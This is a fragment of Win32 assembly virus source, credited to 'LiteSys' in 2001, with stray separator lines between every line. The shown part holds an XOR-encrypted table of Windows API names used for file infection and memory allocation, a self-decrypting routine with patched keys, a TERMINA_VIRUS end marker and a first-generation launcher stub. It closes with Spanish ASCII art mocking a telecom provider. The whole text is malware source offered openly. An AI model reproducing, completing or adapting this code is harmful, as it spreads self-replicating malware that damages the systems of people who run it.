|
|
DB "i" XOR 4Eh
|
|
DB "n" XOR 4Eh
|
|
DB "t" XOR 4Eh
|
|
DB "e" XOR 4Eh
|
|
DB "r" XOR 4Eh
|
|
DB 4Eh
|
|
|
|
DB "S" XOR 4Eh
|
|
DB "e" XOR 4Eh
|
|
DB "t" XOR 4Eh
|
|
DB "E" XOR 4Eh
|
|
DB "n" XOR 4Eh
|
|
DB "d" XOR 4Eh
|
|
DB "O" XOR 4Eh
|
|
DB "f" XOR 4Eh
|
|
DB "F" XOR 4Eh
|
|
DB "i" XOR 4Eh
|
|
DB "l" XOR 4Eh
|
|
DB "e" XOR 4Eh
|
|
DB 4Eh
|
|
|
|
DB "G" XOR 4Eh
|
|
DB "e" XOR 4Eh
|
|
DB "t" XOR 4Eh
|
|
DB "C" XOR 4Eh
|
|
DB "u" XOR 4Eh
|
|
DB "r" XOR 4Eh
|
|
DB "r" XOR 4Eh
|
|
DB "e" XOR 4Eh
|
|
DB "n" XOR 4Eh
|
|
DB "t" XOR 4Eh
|
|
DB "D" XOR 4Eh
|
|
DB "i" XOR 4Eh
|
|
DB "r" XOR 4Eh
|
|
DB "e" XOR 4Eh
|
|
DB "c" XOR 4Eh
|
|
DB "t" XOR 4Eh
|
|
DB "o" XOR 4Eh
|
|
DB "r" XOR 4Eh
|
|
DB "y" XOR 4Eh
|
|
DB "A" XOR 4Eh
|
|
DB 4Eh
|
|
|
|
DB "S" XOR 4Eh
|
|
DB "e" XOR 4Eh
|
|
DB "t" XOR 4Eh
|
|
DB "C" XOR 4Eh
|
|
DB "u" XOR 4Eh
|
|
DB "r" XOR 4Eh
|
|
DB "r" XOR 4Eh
|
|
DB "e" XOR 4Eh
|
|
DB "n" XOR 4Eh
|
|
DB "t" XOR 4Eh
|
|
DB "D" XOR 4Eh
|
|
DB "i" XOR 4Eh
|
|
DB "r" XOR 4Eh
|
|
DB "e" XOR 4Eh
|
|
DB "c" XOR 4Eh
|
|
DB "t" XOR 4Eh
|
|
DB "o" XOR 4Eh
|
|
DB "r" XOR 4Eh
|
|
DB "y" XOR 4Eh
|
|
DB "A" XOR 4Eh
|
|
DB 4Eh
|
|
|
|
DB "G" XOR 4Eh
|
|
DB "e" XOR 4Eh
|
|
DB "t" XOR 4Eh
|
|
DB "S" XOR 4Eh
|
|
DB "y" XOR 4Eh
|
|
DB "s" XOR 4Eh
|
|
DB "t" XOR 4Eh
|
|
DB "e" XOR 4Eh
|
|
DB "m" XOR 4Eh
|
|
DB "T" XOR 4Eh
|
|
DB "i" XOR 4Eh
|
|
DB "m" XOR 4Eh
|
|
DB "e" XOR 4Eh
|
|
DB 4Eh
|
|
|
|
DB "L" XOR 4Eh
|
|
DB "o" XOR 4Eh
|
|
DB "a" XOR 4Eh
|
|
DB "d" XOR 4Eh
|
|
DB "L" XOR 4Eh
|
|
DB "i" XOR 4Eh
|
|
DB "b" XOR 4Eh
|
|
DB "r" XOR 4Eh
|
|
DB "a" XOR 4Eh
|
|
DB "r" XOR 4Eh
|
|
DB "y" XOR 4Eh
|
|
DB "A" XOR 4Eh
|
|
DB 4Eh
|
|
|
|
DB "V" XOR 4Eh
|
|
DB "i" XOR 4Eh
|
|
DB "r" XOR 4Eh
|
|
DB "t" XOR 4Eh
|
|
DB "u" XOR 4Eh
|
|
DB "a" XOR 4Eh
|
|
DB "l" XOR 4Eh
|
|
DB "A" XOR 4Eh
|
|
DB "l" XOR 4Eh
|
|
DB "l" XOR 4Eh
|
|
DB "o" XOR 4Eh
|
|
DB "c" XOR 4Eh
|
|
DB 4Eh
|
|
|
|
DB "V" XOR 4Eh
|
|
DB "i" XOR 4Eh
|
|
DB "r" XOR 4Eh
|
|
DB "t" XOR 4Eh
|
|
DB "u" XOR 4Eh
|
|
DB "a" XOR 4Eh
|
|
DB "l" XOR 4Eh
|
|
DB "F" XOR 4Eh
|
|
DB "r" XOR 4Eh
|
|
DB "e" XOR 4Eh
|
|
DB "e" XOR 4Eh
|
|
DB 4Eh
|
|
|
|
DB "G" XOR 4Eh
|
|
DB "e" XOR 4Eh
|
|
DB "t" XOR 4Eh
|
|
DB "T" XOR 4Eh
|
|
DB "i" XOR 4Eh
|
|
DB "c" XOR 4Eh
|
|
DB "k" XOR 4Eh
|
|
DB "C" XOR 4Eh
|
|
DB "o" XOR 4Eh
|
|
DB "u" XOR 4Eh
|
|
DB "n" XOR 4Eh
|
|
DB "t" XOR 4Eh
|
|
DB 4Eh
|
|
|
|
DB "G" XOR 4Eh
|
|
DB "e" XOR 4Eh
|
|
DB "t" XOR 4Eh
|
|
DB "W" XOR 4Eh
|
|
DB "i" XOR 4Eh
|
|
DB "n" XOR 4Eh
|
|
DB "d" XOR 4Eh
|
|
DB "o" XOR 4Eh
|
|
DB "w" XOR 4Eh
|
|
DB "s" XOR 4Eh
|
|
DB "D" XOR 4Eh
|
|
DB "i" XOR 4Eh
|
|
DB "r" XOR 4Eh
|
|
DB "e" XOR 4Eh
|
|
DB "c" XOR 4Eh
|
|
DB "t" XOR 4Eh
|
|
DB "o" XOR 4Eh
|
|
DB "r" XOR 4Eh
|
|
DB "y" XOR 4Eh
|
|
DB "A" XOR 4Eh
|
|
DB 4Eh
|
|
|
|
DB 0FFh XOR 4Eh ; HO HO HO
|
|
|
|
L_CRIPTA2 EQU $-CRIPTA2
|
|
|
|
DB "(c) Junio-Agosto 2001 LiteSys. Hecho en Venezuela..."
|
|
|
|
DB 14d DUP (00h)
|
|
|
|
@Decriptor_2:
|
|
|
|
LEA ESI, OFFSET [EBP + EMPIEZA_CRYPT]
|
|
MOV ECX, (@Decriptor_2 - EMPIEZA_CRYPT) / 12
|
|
|
|
@DC2:
|
|
XOR DWORD PTR [ESI], 12345678h
|
|
ORG $-4
|
|
LLAVE2A DD 00000000h
|
|
ADD ESI, 04h
|
|
SUB DWORD PTR [ESI], 12345678h
|
|
ORG $-4
|
|
LLAVE2B DD 00000000h
|
|
ADD ESI, 04h
|
|
ADD DWORD PTR [ESI], 12345678h
|
|
ORG $-4
|
|
LLAVE2C DD 00000000h
|
|
ADD ESI, 04h
|
|
LOOP @DC2
|
|
|
|
RET
|
|
|
|
DB 12d DUP (90h)
|
|
|
|
|
|
TAMA¥O_DEC2 EQU $-@Decriptor_2
|
|
|
|
TERMINA_VIRUS LABEL NEAR
|
|
|
|
_PrimGen:
|
|
|
|
XOR EAX, EAX
|
|
PUSH EAX
|
|
PUSH OFFSET Titlo
|
|
PUSH OFFSET Mensje
|
|
PUSH EAX
|
|
CALL MessageBoxA
|
|
|
|
PUSH 0
|
|
CALL ExitProcess
|
|
|
|
END ALMA
|
|
|
|
e s l a h o r a d e o t r o e s t u p i d o a s c i i a r t . . .
|
|
|
|
__
|
|
________ | .| <- PONEME A MAMA!!!
|
|
| | | |
|
|
.-----------------[ cantv | .-o-o-| |
|
|
| |________| | | |.
|
|
| | | |__| >- ¨EN 69?
|
|
.-"-----+---. | |
|
|
| 1 2 3 |_H_| | |
|
|
| 4 5 6 | | | .-o-o-o-o'
|
|
| 7 8 9 |___| | .-'
|
|
| * 0 # | |-o-o-o-o-o'
|
|
`-------+---' |
|
|
|
|
|
`--------< cantv te roba...
|